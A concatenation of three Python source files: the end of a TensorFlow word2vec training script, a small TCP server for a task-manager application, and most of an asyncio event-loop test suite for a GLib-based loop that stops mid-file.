def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print
print "Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total)
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print "\n%s\n=====================================" % (words[i])
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print "%-20s %6.4f" % (self._id2word[neighbor], distance)
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print "--train_data --eval_data and --save_path must be specified."
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy('france', 'paris', 'russia')
# [1]: model.nearby(['proton', 'elephant', 'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
server.py
|
"""Tcp server module."""
import socket
import threading
from taskmanager.tcp_protocol import const_tcp
from taskmanager.tcp_protocol import message_templates as tmp
from taskmanager.process_management import task_manager as tm
class TCPServer:
"""The class that is responsible for creating the server object."""
def __init__(self):
"""Create a socket and connect to a port."""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((const_tcp.TCP_IP, const_tcp.TCP_PORT))
self.sock.listen()
self.manager = tm.Manager()
def message_processing(self, connection, data):
"""Method for processing messages."""
if tmp.START_APP in data:
self.manager.manage_application(
data.replace(tmp.START_APP, ''))
elif tmp.STOP_APP in data:
self.manager.manage_application(
data.replace(tmp.STOP_APP, ''), close=True)
elif tmp.SEND_MSG in data:
self.manager.sending_messages(
data.replace(tmp.SEND_MSG, ''))
elif tmp.UPD_RPOCESS in data:
connection.send(
self.manager.get_list_of_applications().encode('UTF-8'))
def client_listening(self):
"""Waiting for messages from the client."""
while True:
connection, address = self.sock.accept()
data = connection.recv(const_tcp.BUFFER_SIZE)
self.message_processing(connection, data.decode('UTF-8'))
def start(self):
"""Start a separate thread for server operation."""
server_thread = threading.Thread(target=self.client_listening)
server_thread.start()
|
test_events.py
|
"""Tests for events.py."""
#TODO: port the Handle and Policy tests
import functools
import gc
import io
import os
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
HAS_SNI = False
else:
from ssl import HAS_SNI
import subprocess
import sys
import threading
import time
import errno
import unittest
import unittest.mock
import testsupport # find_unused_port, IPV6_ENABLED, TEST_HOME_DIR
import asyncio
from asyncio import events
from asyncio import selector_events
from asyncio import test_utils
import gpotato
from gi.repository import GLib
from gi.repository import GObject
def data_file(filename):
if hasattr(testsupport, 'TEST_HOME_DIR'):
fullname = os.path.join(testsupport.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
class MyProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class LoopSetupMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
asyncio.set_event_loop(None)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
def create_event_loop(self):
# Just a default, for test sets that don't care
return gpotato.GLibEventLoop(GLib.main_context_default())
class EventLoopTestsMixin(LoopSetupMixin):
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
bytes_read = []
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.append(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_briefly(self.loop)
self.loop.call_soon(w.send, b'def')
test_utils.run_briefly(self.loop)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(b''.join(bytes_read), b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
self.loop.add_writer(w.fileno(), w.send, b'x'*(256*1024))
test_utils.run_briefly(self.loop)
def remove_writer():
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.loop.call_soon(remove_writer)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
w.close()
data = r.recv(256*1024)
r.close()
self.assertGreaterEqual(len(data), 200)
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
test_utils.run_briefly(self.loop)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_briefly(self.loop)
self.assertEqual(caught, 1)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
# SIGALRM not supported by GLib
@unittest.skipUnless(0 and hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(0 and hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
@unittest.expectedFailure
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address,
ssl=test_utils.dummy_ssl_context())
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in type(tr).__name__.lower())
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = testsupport.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_create_server(self):
proto = None
def factory():
nonlocal proto
proto = MyProto()
return proto
f = self.loop.create_server(factory, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
test_utils.run_briefly(self.loop)
test_utils.run_until(self.loop, lambda: proto is not None, 10)
self.assertIsInstance(proto, MyProto)
#run_briefly() cannot guarantee that we run a single iteration (in the GLib loop)
# self.assertEqual('INITIAL', proto.state)
test_utils.run_briefly(self.loop)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0,
timeout=10)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
test_utils.run_briefly(self.loop) # windows iocp
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
f = self.loop.create_server(
factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = None
class ClientMyProto(MyProto):
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def factory():
nonlocal proto
proto = MyProto(loop=self.loop)
return proto
server, host, port = self._make_ssl_server(factory, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(ClientMyProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
test_utils.run_briefly(self.loop)
self.assertIsInstance(proto, MyProto)
test_utils.run_briefly(self.loop)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0,
timeout=10)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(HAS_SNI, 'No SNI support in ssl module')
def test_create_server_ssl_verify_failed(self):
proto = None
def factory():
nonlocal proto
proto = MyProto(loop=self.loop)
return proto
server, host, port = self._make_ssl_server(factory, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with self.assertRaisesRegex(ssl.SSLError,
'certificate verify failed '):
self.loop.run_until_complete(f_c)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(HAS_SNI, 'No SNI support in ssl module')
def test_create_server_ssl_match_failed(self):
proto = None
def factory():
nonlocal proto
proto = MyProto(loop=self.loop)
return proto
server, host, port = self._make_ssl_server(factory, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(HAS_SNI, 'No SNI support in ssl module')
def test_create_server_ssl_verified(self):
proto = None
def factory():
nonlocal proto
proto = MyProto(loop=self.loop)
return proto
server, host, port = self._make_ssl_server(factory, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(testsupport.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = testsupport.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertEqual('INITIALIZED', client.state)
transport.sendto(b'xxx')
for _ in range(1000):
if server.nbytes:
break
test_utils.run_briefly(self.loop)
self.assertEqual(3, server.nbytes)
for _ in range(1000):
if client.nbytes:
break
test_utils.run_briefly(self.loop)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = None
def factory():
nonlocal proto
proto = MyReadPipeProto(loop=self.loop)
return proto
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(factory, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_briefly(self.loop)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_briefly(self.loop)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@testsupport.requires_mac_ver(10, 6)
def test_read_pty_output(self):
proto = None
def factory():
nonlocal proto
proto = MyReadPipeProto(loop=self.loop)
return proto
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(factory,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
proto = None
transport = None
def factory():
nonlocal proto
proto = MyWritePipeProto(loop=self.loop)
return proto
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
@asyncio.coroutine
def connect():
nonlocal transport
t, p = yield from self.loop.connect_write_pipe(factory, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport = t
self.loop.run_until_complete(connect())
transport.write(b'1')
test_utils.run_briefly(self.loop)
data = os.read(rpipe, 1024)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_briefly(self.loop)
data = os.read(rpipe, 1024)
self.assertEqual(b'2345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
